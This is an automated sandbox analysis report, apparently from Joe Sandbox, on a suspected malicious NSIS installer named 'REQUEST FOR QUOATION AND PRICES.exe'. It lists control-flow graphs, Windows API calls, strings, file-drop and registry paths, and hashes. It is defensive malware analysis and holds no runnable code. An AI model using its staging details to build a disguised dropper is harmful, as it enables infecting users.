397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 432 403013-403018 424->432 433 402f48-402f4b 424->433 426 402e63 425->426 427 402e65-402e72 call 4032f9 425->427 426->427 434 402e78-402e7e 427->434 435 402fcf-402fd7 call 402d1a 427->435 432->417 436 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 433->436 437 402f4d-402f65 call 40330f call 4032f9 433->437 438 402e80-402e98 call 405b11 434->438 439 402efe-402f02 434->439 435->432 463 402fc5-402fca 436->463 464 402fd9-403009 call 40330f call 403062 436->464 437->432 460 402f6b-402f71 437->460 445 402f0b-402f11 438->445 458 402e9a-402ea1 438->458 444 402f04-402f0a call 402d1a 439->444 439->445 444->445 451 402f13-402f21 call 406302 445->451 452 402f24-402f2e 445->452 451->452 452->424 452->425 458->445 462 402ea3-402eaa 458->462 460->432 460->436 462->445 465 402eac-402eb3 462->465 463->417 471 40300e-403011 464->471 465->445 467 402eb5-402ebc 465->467 467->445 470 402ebe-402ede 467->470 470->432 472 402ee4-402ee8 470->472 471->432 473 40301a-40302b 471->473 474 402ef0-402ef8 472->474 475 402eea-402eee 472->475 477 403033-403038 473->477 478 40302d 473->478 474->445 476 402efa-402efc 474->476 475->424 475->474 476->445 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,00000400), ref: 00402DEC
                                                                                                                                  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00402E35
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 2803837635-1672131642
                                                                                                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 609 401752-401777 call 402b3a call 4059ac 614 401781-401793 call 405eea call 405935 lstrcatW 609->614 615 401779-40177f call 405eea 609->615 620 401798-401799 call 40617e 614->620 615->620 624 40179e-4017a2 620->624 625 4017a4-4017ae call 40622d 624->625 626 4017d5-4017d8 624->626 633 4017c0-4017d2 625->633 634 4017b0-4017be CompareFileTime 625->634 628 4017e0-4017fc call 405b56 626->628 629 4017da-4017db call 405b31 626->629 636 401870-401899 call 405194 call 403062 628->636 637 4017fe-401801 628->637 629->628 633->626 634->633 649 4018a1-4018ad SetFileTime 636->649 650 40189b-40189f 636->650 638 401852-40185c call 405194 637->638 639 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 637->639 651 401865-40186b 638->651 639->624 671 401847-401848 639->671 654 4018b3-4018be CloseHandle 649->654 650->649 650->654 655 4029d0 651->655 657 4018c4-4018c7 654->657 658 4029c7-4029ca 654->658 659 4029d2-4029d6 655->659 661 4018c9-4018da call 405f0c lstrcatW 657->661 662 4018dc-4018df call 405f0c 657->662 658->655 668 4018e4-402243 call 4056c6 661->668 662->668 668->659 671->651 673 40184a-40184b 671->673 673->638
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 00401793
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,?,00000031), ref: 004017B8
                                                                                                                                  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp$C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                                                • API String ID: 1941528284-2687597418
                                                                                                                                • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 675 402573-402588 call 402b1d 678 4029c7-4029ca 675->678 679 40258e-402595 675->679 682 4029d0-4029d6 678->682 680 402597 679->680 681 40259a-40259d 679->681 680->681 683 4025a3-4025b2 call 405e4a 681->683 684 4026e6-4026ee 681->684 683->684 688 4025b8 683->688 684->678 689 4025be-4025c2 688->689 690 402657-402667 call 405bd9 689->690 691 4025c8-4025e3 ReadFile 689->691 690->684 696 402669 690->696 691->684 693 4025e9-4025ee 691->693 693->684 695 4025f4-402602 693->695 697 4026a2-4026ae call 405e31 695->697 698 402608-40261a MultiByteToWideChar 695->698 699 40266c-40266f 696->699 697->682 698->696 701 40261c-40261f 698->701 699->697 703 402671-402676 699->703 702 402621-40262c 701->702 702->699 705 40262e-402653 SetFilePointer MultiByteToWideChar 702->705 706 4026b3-4026b7 703->706 707 402678-40267d 703->707 705->702 710 402655 705->710 708 4026d4-4026e0 SetFilePointer 706->708 709 4026b9-4026bd 706->709 707->706 711 40267f-402692 707->711 708->684 712 4026c5-4026d2 709->712 713 4026bf-4026c3 709->713 710->696 711->684 714 402694-40269a 711->714 712->684 713->708 713->712 714->689 715 4026a0 714->715 715->684
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                  • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 1149667376-2366072709
                                                                                                                                • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 716 40317d-4031a6 GetTickCount 717 4032e7-4032ef call 402d1a 716->717 718 4031ac-4031d7 call 40330f SetFilePointer 716->718 723 4032f1-4032f6 717->723 724 4031dc-4031ee 718->724 725 4031f0 724->725 726 4031f2-403200 call 4032f9 724->726 725->726 729 403206-403212 726->729 730 4032d9-4032dc 726->730 731 403218-40321e 729->731 730->723 732 403220-403226 731->732 733 403249-403265 call 406390 731->733 732->733 734 403228-403248 call 402d1a 732->734 739 4032e2 733->739 740 403267-40326f 733->740 734->733 741 4032e4-4032e5 739->741 742 403271-403287 WriteFile 740->742 743 4032a3-4032a9 740->743 741->723 745 403289-40328d 742->745 746 4032de-4032e0 742->746 743->739 744 4032ab-4032ad 743->744 744->739 748 4032af-4032c2 744->748 745->746 747 40328f-40329b 745->747 746->741 747->731 749 4032a1 747->749 748->724 750 4032c8-4032d7 SetFilePointer 748->750 749->748 750->717
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                  • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                • WriteFile.KERNELBASE(0040BE78,0040DA52,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                • SetFilePointer.KERNELBASE(0000666C,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$CountTickWrite
                                                                                                                                • String ID: x>A
                                                                                                                                • API String ID: 2146148272-3854404225
                                                                                                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 751 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 758 4029c7-4029d6 751->758 759 40237d-402385 751->759 760 402387-402394 call 402b3a lstrlenW 759->760 761 402398-40239b 759->761 760->761 764 4023ab-4023ae 761->764 765 40239d-4023aa call 402b1d 761->765 769 4023b0-4023ba call 403062 764->769 770 4023bf-4023d3 RegSetValueExW 764->770 765->764 769->770 771 4023d5 770->771 772 4023d8-4024b2 RegCloseKey 770->772 771->772 772->758 776 402793-40279a 772->776 776->758
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp
                                                                                                                                • API String ID: 1356686001-871014004
                                                                                                                                • Opcode ID: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                                • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                • Opcode Fuzzy Hash: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                                • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 777 4015b9-4015cd call 402b3a call 4059e0 782 401614-401617 777->782 783 4015cf-4015eb call 405962 CreateDirectoryW 777->783 785 401646-402197 call 401423 782->785 786 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 782->786 790 40160a-401612 783->790 791 4015ed-4015f8 GetLastError 783->791 798 4029c7-4029d6 785->798 786->798 800 40163e-401641 786->800 790->782 790->783 795 401607 791->795 796 4015fa-401605 GetFileAttributesW 791->796 795->790 796->790 796->795 800->798
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,771B2EE0,00405792,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"), ref: 004059EE
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,00000000,000000F0), ref: 00401630
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 00401623
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
